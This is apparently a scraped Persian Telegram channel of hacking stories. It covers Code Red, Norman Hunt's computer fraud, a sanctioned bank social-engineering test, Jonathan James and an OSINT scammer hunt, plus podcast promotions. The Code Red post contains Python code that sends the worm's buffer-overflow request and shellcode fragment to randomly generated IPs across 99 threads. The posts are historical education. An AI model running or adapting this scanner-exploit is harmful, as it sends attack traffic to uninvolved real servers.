TryHackBox Story – Telegram
TryHackBox Story
888 subscribers
52 photos
3 videos
13 files
59 links
📖 داستان های هک قانونی و غیرقانونی
داستان های خود را با ما در میان بگذارید :
@TryHackBoxStorybot

کانال اصلی :
@TryHackBox
کانال رودمپ :
@TryHackBoxOfficial
رادیو زیرو پاد :
@RadioZeroPod
Download Telegram
TryHackBox Story
🪱 کد رد (Code Red) • صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعه‌های نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را می‌نوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام…
تحلیل حمله بر فرض مثال چطوری کرم گسترش پیدا کرده :

۱. روش اصلی حمله: سوءاستفاده از آسیب‌پذیری سرریز بافر (Buffer Overflow)


هدف: وب‌سرورهای Microsoft IIS (Internet Information Services) که نسخه‌های آسیب‌پذیر کتابخانه idq.dll را اجرا می‌کردند.

مکانیزم:
کرم با ارسال یک درخواست HTTP مخرب به شکل زیر، باعث سرریز بافر در ماژول ایندکس‌سازی (Indexing Service) می‌شد:

GET /default.ida?[رشته طولانی از Nها]%u9090%u6858%ucbd3%u7801... HTTP/1.0

رشته Nها باعث سرریز بافر و بازنویسی حافظه می‌شد.

کد هگزادسیمال بعدی (%u9090...) حاوی دستورات ماشینی (Shellcode) بود که کنترل سرور را به مهاجم می‌داد.

۲. روش‌های گسترش خودکار

+ اسکن تصادفی IPها:
کرم به صورت خودکار آدرس‌های IP تصادفی را اسکن می‌کرد و به هر سروری که پورت ۸۰ (HTTP) باز بود، درخواست مخرب خود را ارسال می‌نمود.

اسکن تصادفی IPها
کرم Code Red از الگوریتم‌های ساده‌ای برای تولید آدرس‌های IP تصادفی استفاده می‌کرد. در پایتون، این فرآیند را می‌توان به صورت زیر شبیه‌سازی کرد:

import random

def generate_random_ip():
    return ".".join(str(random.randint(0, 255)) for _ in range(4))

# مثال: تولید ۱۰ آدرس IP تصادفی
for _ in range(10):
    print(generate_random_ip())

+ ارسال درخواست مخرب به پورت ۸۰
کرم پس از پیدا کردن یک سرور با پورت ۸۰ باز، درخواست HTTP مخرب خود را ارسال می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه socket شبیه‌سازی کرد:

import socket

def send_malicious_request(ip):
    try:
        # ایجاد یک سوکت TCP
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)  # تنظیم timeout برای اتصال
        sock.connect((ip, 80))  # اتصال به پورت ۸۰
       
        # ارسال درخواست مخرب
        malicious_request = (
            "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\r\n"
            "Host: example.com\r\n"
            "\r\n"
        )
        sock.send(malicious_request.encode())
       
        # دریافت پاسخ (اختیاری)
        response = sock.recv(4096)
        print(f"Response from {ip}: {response.decode()}")
       
        sock.close()
    except Exception as e:
        print(f"Failed to connect to {ip}: {e}")

# مثال: ارسال درخواست به یک IP تصادفی
random_ip = generate_random_ip()
send_malicious_request(random_ip)

تکثیر موازی:
روی هر سیستم آلوده، ۹۹ thread موازی ایجاد می‌کرد تا اسکن و آلوده‌سازی را تسریع کند.

+ ایجاد Threadهای موازی برای اسکن و آلوده‌سازی
کرم Code Red از ۹۹ thread موازی برای تسریع فرآیند اسکن و آلوده‌سازی استفاده می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه threading شبیه‌سازی کرد:

import threading

def scan_and_infect(ip):
    print(f"Scanning {ip}...")
    send_malicious_request(ip)

# ایجاد ۹۹ thread موازی
threads = []
for _ in range(99):
    ip = generate_random_ip()
    thread = threading.Thread(target=scan_and_infect, args=(ip,))
    thread.start()
    threads.append(thread)

# منتظر ماندن برای اتمام تمام threadها
for thread in threads:
    thread.join()

---

عدم نیاز به تعامل کاربر:
برخلاف بسیاری از بدافزارها، Code Red برای گسترش نیازی به کلیک کاربر یا اجرای فایل پیوست نداشت. تنها کافی بود سرور به اینترنت متصل باشد!

جمع‌بندی
این کدها صرفاً برای درک بهتر مکانیزم‌های گسترش کرم Code Red ارائه شده‌اند. امروزه، چنین حملاتی با استفاده از فایروال‌ها، سیستم‌های تشخیص نفوذ (IDS)، و به‌روزرسانی‌های امنیتی به راحتی قابل پیشگیری هستند.

@TryHackBoxStory
👍5
TryHackBox Story pinned «🪱 کد رد (Code Red) • صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعه‌های نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را می‌نوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام…»
داستان بعدی هک بانک با استفاده از روش های مهندسی اجتماعی ...
🔥7🤯1
اولین کلاهبرداری IT با خسارت مالی قابل توجه

• اولین کلاهبرداری IT با خسارت مالی قابل توجه توسط نورمن هانت در سال ۱۹۷۷ انجام شد. هانت با نام جعلی دیوید وینتروپ، شرکتی به نام DataSync Corp در شهر سانتا ماریا، ایالت کالیفرنیا تأسیس کرد. این شرکت به طور گسترده در مجلات کامپیوتری تبلیغ می‌شد و هانت در این تبلیغات با عکس‌های رنگی و جذاب، تجهیزات کامپیوتری را با قیمت‌های بسیار پایین‌تر از بازار عرضه می‌کرد. اما نکته اینجا بود که این تجهیزات اصلاً وجود خارجی نداشتند و هانت تنها از طریق فروش "هوای گرم" به مشتریان پول به جیب می‌زد.

• در ژوئن ۱۹۷۷، هانت به دلیل کلاهبرداری دستگیر شد و به سه سال زندان محکوم گردید. اما او کمتر از شش ماه در زندان ماند و موفق به فرار شد. پس از فرار، به ایالت آریزونا رفت و نام خود را به جیم اندرسون تغییر داد. سپس شرکتی جدید به نام World Power Systems (WPS) تأسیس کرد.

• هانت دوباره قصد داشت به شیوه‌های قدیمی خود بازگردد و تجهیزات جعلی را با قیمت‌های بسیار پایین تبلیغ کند. اما این بار برخی از علاقه‌مندان به کامپیوتر متوجه شدند که تجهیزات تبلیغ‌شده در عکس‌ها به درستی سرهم‌بندی نشده‌اند و حتی برخی از دستگاه‌ها فاقد اتصالات لازم برای برق بودند! بنابراین، هانت مجبور شد برای مدتی به طور قانونی عمل کند تا اعتماد مشتریان را جلب کند. در این مدت، شرکت WPS سفارشات را دریافت و به موقع ارسال می‌کرد. اما با افزایش حجم سفارشات، هانت دوباره به سراغ شیوه‌های کلاهبرداری رفت.

• او به نام شرکت WPS، نامه‌هایی به مشتریان ارسال می‌کرد و به آن‌ها اطلاع می‌داد که به دلیل کمبود تجهیزات، سفارشات آن‌ها با تأخیر مواجه خواهد شد. در عین حال، شرکت WPS از تأمین‌کنندگان خود درخواست می‌کرد که تجهیزات را به صورت اعتباری یا با تأخیر در پرداخت تحویل دهند. اگر تأمین‌کنندگان موافقت می‌کردند، هانت سفارشات بزرگی برای قطعات گران‌قیمت ثبت می‌کرد و قول می‌داد که پرداخت‌ها را ظرف ۳۰ روز انجام دهد. در نتیجه، انبارهای شرکت پر از تجهیزات می‌شد، اما به مشتریان چیزی تحویل داده نمی‌شد.

• وقتی وضعیت شرکت بحرانی شد و طلبکاران تهدید به شکایت کردند، هانت مرحله بعدی کلاهبرداری خود را آغاز کرد. او حساب‌های بانکی شرکت را خالی کرد و پول‌ها را به حساب‌های شخصی خود انتقال داد. سپس با ایجاد پیچیدگی در لجستیک، تجهیزات را به انبارهای مخفی و مکان‌های غیرقابل ردیابی منتقل کرد تا ردپای خود را از چشم پلیس پاک کند. در نهایت، او یک قربانی پیدا کرد تا تمام تقصیرها را به گردن او بیندازد.

• هانت از قبل یک کارمند ساده‌لوح را انتخاب کرده بود و او را به عنوان رئیس شرکت منصوب کرد. پس از انتقال دارایی‌های شرکت و آماده‌سازی همه چیز برای فرار، هانت به مرخصی طولانی‌مدت رفت و کنترل شرکت را به رئیس جدید سپرد. در حالی که هانت با پول‌ها و تجهیزات دزدیده‌شده از ایالت فرار کرد، پلیس رئیس جدید را در همان روزهای اول دستگیر کرد و تحقیقات را آغاز نمود. این در حالی بود که هانت فرصت کافی برای فرار و ادامه فعالیت‌های مجرمانه خود در ایالت‌های دیگر داشت.

• اما پایان داستان قابل پیش‌بینی بود: هانت دستگیر شد و به زندان افتاد. با این حال، حتی در زندان هم دست از کلاهبرداری برنداشت. این بار او یک نرم‌افزار جعلی به نام "Word Type" را به نگهبانان زندان فروخت. این نرم‌افزار ادعا می‌کرد که شامل ۱۰۰ برنامه مختلف است و قیمت آن تنها ۱۰۹٫۹۵ دلار بود. اما هر کسی که این بسته را خریداری می‌کرد، متوجه می‌شد که برنامه‌ها یا اصلاً اجرا نمی‌شوند یا فقط نسخه‌های تغییر نام یافته‌ای از برنامه‌های موجود هستند.

• پس از افشای این کلاهبرداری، هانت در سال ۱۹۸۱ به یک مرکز اصلاح و تربیت در سن دیگو منتقل شد و ردپای ماجراهای کامپیوتری او برای همیشه ناپدید شد.

بخش اول
@TryHackBoxStory
👍2
روش‌های استفاده‌شده توسط هانت:
1. تبلیغات فریبنده: 
   هانت از تبلیغات جذاب در مجلات کامپیوتری برای جلب اعتماد مشتریان استفاده می‌کرد. او با استفاده از عکس‌های رنگی و ادعاهای دروغین، مشتریان را فریب می‌داد.

2. فروش تجهیزات جعلی: 
   او تجهیزاتی را تبلیغ می‌کرد که اصلاً وجود نداشتند و تنها از طریق فروش "هوای گرم" پول به جیب می‌زد.

3. جعل هویت: 
   هانت چندین بار نام و هویت خود را تغییر داد تا از دست پلیس فرار کند.

4. سوءاستفاده از اعتماد تأمین‌کنندگان: 
   او از تأمین‌کنندگان تجهیزات درخواست می‌کرد که قطعات را به صورت اعتباری تحویل دهند، اما پس از دریافت تجهیزات، پرداخت‌ها را انجام نمی‌داد.

5. پول‌شویی و انتقال دارایی‌ها: 
   هانت حساب‌های بانکی شرکت را خالی می‌کرد و پول‌ها را به حساب‌های شخصی خود انتقال می‌داد. سپس تجهیزات را به انبارهای مخفی منتقل می‌کرد تا از دسترس پلیس دور بماند.

6. استفاده از قربانی: 
   او یک کارمند ساده‌لوح را به عنوان رئیس شرکت منصوب می‌کرد تا در صورت دستگیری، تمام تقصیرها به گردن او بیفتد.

7. فروش نرم‌افزار جعلی: 
   حتی در زندان، هانت با فروش نرم‌افزارهای جعلی مانند "Word Type" به نگهبانان، به کلاهبرداری ادامه داد.

نتیجه‌گیری:
داستان نورمن هانت نمونه‌ای کلاسیک از کلاهبرداری‌های IT است که نشان‌دهنده اهمیت اعتماد‌سازی، بررسی دقیق پیشینه شرکت‌ها و آگاهی از شیوه‌های کلاهبرداری است. این داستان همچنین یادآور این است که حتی در دنیای فناوری، هوش و خلاقیت مجرمان می‌تواند خطرات بزرگی ایجاد کند.
بخش پایانی
@TryHackBoxStory
👍2
داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...

این مقاله درباره نفوذ فیزیکی به یکی از بانک‌های لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!

• کل داستان مجموعه‌ای از واقعیت‌ها است که با نظرات شخصی او از سخنرانی‌ها، مصاحبه‌ها و گفت‌وگوهای پشت صحنه ترکیب شده است. اگر علاقه‌مندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده ...

خلاصه داستان :
. جیسون استریت، که به خاطر مهارت‌هایش در تست نفوذ فیزیکی و مهندسی اجتماعی معروف است، مأموریت داشت امنیت فیزیکی یک بانک در لبنان را آزمایش کند. او با استفاده از تکنیک‌های خلاقانه و مهندسی اجتماعی، موفق شد به داخل بانک نفوذ کند. این پروژه کاملاً قانونی و با هماهنگی بانک انجام شد، اما نتایج آن برای همه غیرمنتظره بود.
به زودی در کانال قرار میگیرد
@TryHackBoxStory
👍4
Hack Bank With Social Enginnering pdf.pdf
596.7 KB
داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...

این مقاله درباره نفوذ فیزیکی به یکی از بانک‌های لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!

• کل داستان مجموعه‌ای از واقعیت‌ها است که با نظرات شخصی او از سخنرانی‌ها، مصاحبه‌ها و گفت‌وگوهای پشت صحنه ترکیب شده است. اگر علاقه‌مندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده ...
@TryHackBoxStory
@TryHackBox
@TryHackBoxOfficial
به تیم ضبط پادکست‌های امنیتی و داستان‌های TryHackBox بپیوندید!

آیا علاقه مند به دنیای امنیت سایبری هستید و دوست دارید دانش خود را با دیگران به اشتراک بگذارید؟

آیا به روایت داستان‌های جذاب و تولید محتوای صوتی علاقه‌مندید؟

ما در TryHackBox به دنبال افراد پرانرژی و خلاق هستیم تا به تیم ضبط پادکست‌های ما بپیوندند. اگر شما:

به حوزه امنیت سایبری و داستان‌های مرتبط با آن علاقه‌مندید،

مهارت‌های خوبی در گویندگی، نویسندگی یا تولید محتوای صوتی دارید،

یا حتی می‌خواهید این مهارت‌ها را یاد بگیرید و رشد کنید،

ما فرصتی عالی برای شما داریم!

چرا به ما بپیوندید؟

در تولید محتوای جذاب و آموزنده مشارکت کنید.

با تیمی حرفه‌ای و پویا همکاری داشته باشید.

مهارت‌های خود را در زمینه تولید پادکست و روایت داستان‌ها ارتقا دهید.

در گسترش دانش امنیت سایبری به شیوه‌ای خلاقانه نقش داشته باشید.

اگر علاقه‌مند هستید، همین حالا به ما پیام دهید:

📍نیاز فوری: به یک یا دو نفر تدوین‌گر حرفه‌ای نیز نیازمندیم! 

@Delaram_Najafii
🔥3👍1
داستان زندگی و مرگ یک هکر که در.pdf
1.3 MB
💬 داستان واقعی

جاناتان جیمز. داستان هکری که پنتاگون و ناسا را ​​در سن 15 سالگی هک کرد.

سخت ترین قسمت ورود به سیستم نیست، بلکه یادگیری و کسب دانش است تا بتوانید بفهمید که با آن چه کاری می توانید انجام دهید.

• امروز می خواهم داستان زندگی جالب یک هکر به نام جاناتان جونز را با شما به اشتراک بگذارم که موفق شد به سرورهای ناسا نفوذ کند، پنتاگون را هک کند، نرم افزار کنترل ISS را بدزدد و یک درب پشتی روی سرورهای یکی از دپارتمان های نظامی آمریکا نصب کند. و همه اینها در 15 سالگی ... از خواندن لذت ببرید .

@TryHackBoxStory
😢1🙏1
داستان بعدی نحوه شناسایی یک کلاهبردار با استفاده از اوسینت و مهندسی اجتماعی ...
👍8
Forwarded from Try Hack Box
دوستان ما بخشی رو راه اندازی کردیم به اسم رادیو زیرو پاد که در اینجا فعلا داستان هایی که قرار میدیم رو برای شما به صورت پادکست در اوردیم و اگر استقبال خوبی بشه بقیه موارد هم به پادکست اضافه می شود .

درحال حاضر میتوانید داستان هایی که قرار دادیم را به طور پادکست پلی کنید و لذت ببرید .

@RadioZeroPod
👍1
قسمت اول  رادیو زیرو پاد/دی - هکر Pompompurin: یک تحلیل OSINT و…
@TryHackBoxStory
📖 قسمت اول رادیو زیرو پاد

💠 هکر Pompompurin: یک تحلیل OSINT و هوش تهدید

از RaidForum تا IntelBroker 

اوسینت – Scope of Osint

اهمیت OSINT در تحقیقات

نقش هوش تهدید در تحقیقات

پیشینه BreachForums

تحقیق درباره Pompompurin

تکنیک‌های جمع‌آوری داده‌ها

درباره OSIVE

درگیری بین RaidForums و BreachForums با پیتر کلایسنر 

درباره BreachForums

گام‌های تحلیل و بررسی اطلاعات

روش‌های تحلیل

ابزارها و روش‌ها

🧩 لینک مقاله برای خواندن :

https://news.1rj.ru/str/TryHackBoxStory/55

📼 با اجرای آریامهر
#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
3
TryHackBox Story pinned «به تیم ضبط پادکست‌های امنیتی و داستان‌های TryHackBox بپیوندید! آیا علاقه مند به دنیای امنیت سایبری هستید و دوست دارید دانش خود را با دیگران به اشتراک بگذارید؟ آیا به روایت داستان‌های جذاب و تولید محتوای صوتی علاقه‌مندید؟ ما در TryHackBox به دنبال افراد…»
قسمت دوم رادیو زیرو پاد -  جاناتان جیمز هکری که پنتاگون و ناسا را…
@TryHackBoxStory
📖 قسمت دوم رادیو زیرو پاد  

💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را ​​در سن 15 سالگی هک کرد.

دوران کودکی

هک شبکه مدارس

جرم و مجازات

شکار هکر

مرگ یک قهرمان

🧩 لینک مقاله برای خواندن :

https://news.1rj.ru/str/TryHackBoxStory/76

📼 با اجرای آریامهر

#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
دوستان اگر میبینید فایل های داستانها هم هست برای این هست که نکات فنی یا کامندها رو بدونید و صرفا گفته نشود
5
Forwarded from Try Hack Box
درود دوستان عزیز

اگر از آموزش‌های ما استفاده می‌کنید و دوست دارید از تلاش ما حمایت کنید، می‌توانید از طریق لینک زیر کمک کوچکی به ما داشته باشید

https://daramet.com/TryHackBox

راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید. 

ممنون که همراه ما هستید. 
👍1
Audio
@TryHackBoxStory | @RadioZeroPod
📖 قسمت سوم رادیو زیرو پاد  

💠 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی

اولین پروژه

روش های مهندسی اجتماعی

🧩 لینک مقاله برای خواندن :

Link

📼 با اجرای آریامهر

#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
🔥3🤣1
نحوه_شناسایی_یک_کلاهبردار_با_استفاده_از_اوسینت.pdf
2.3 MB
💠 تا به حال فکر کرده اید که پشت این ایمیل ها چه کسی نشسته؟
🔶️ شروع کار: تعیین هدف
🔶️ بررسی اولیه: ردپای دیجیتال
🔶️ شروع بازی: ساخت یک چهره جعلی
🔶️ ابزارهای OSINT مخصوص پی‌پال
🔶️ نتیجه‌گیری: یک گزارش کامل
🔶️ چه سفر پرماجرایی!
🔶️ آموزش گام‌به‌گام روش‌های استفاده‌شده در داستان "فریب کلاهبردار با OSINT و مهندسی اجتماعی"
🔶️ ابزارهای مورد نیاز برای ساخت وبسایت بی‌خطر
🔶️ سخن پایانی
@TryHackBoxStory
👏21
قسمت چهارم رادیو زیروپاد - نحوه شناسایی یک کلاهبردار با استفاده…
@RadioZeroPod | @TryHackBoxStory
📖 قسمت چهارم رادیو زیروپاد

💠 نحوه شناسایی یک کلاهبردار با استفاده از اوسینت

🔶️ تا به حال فکر کرده اید که پشت این ایمیل ها چه کسی نشسته؟
🔶️ شروع کار: تعیین هدف
🔶️ بررسی اولیه: ردپای دیجیتال
🔶️ شروع بازی: ساخت یک چهره جعلی
🔶️ ابزارهای OSINT مخصوص پی‌پال
🔶️ نتیجه‌گیری: یک گزارش کامل
🔶️ چه سفر پرماجرایی!
🔶️ آموزش گام‌به‌گام روش‌های استفاده‌شده در  داستان "فریب کلاهبردار با OSINT و مهندسی اجتماعی"
🔶️ ابزارهای مورد نیاز برای ساخت وبسایت بی‌خطر
🔶️ سخن پایانی

🧩 لینک برای خواندن مقاله :
Link

📼 با اجرای آریامهر

#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
2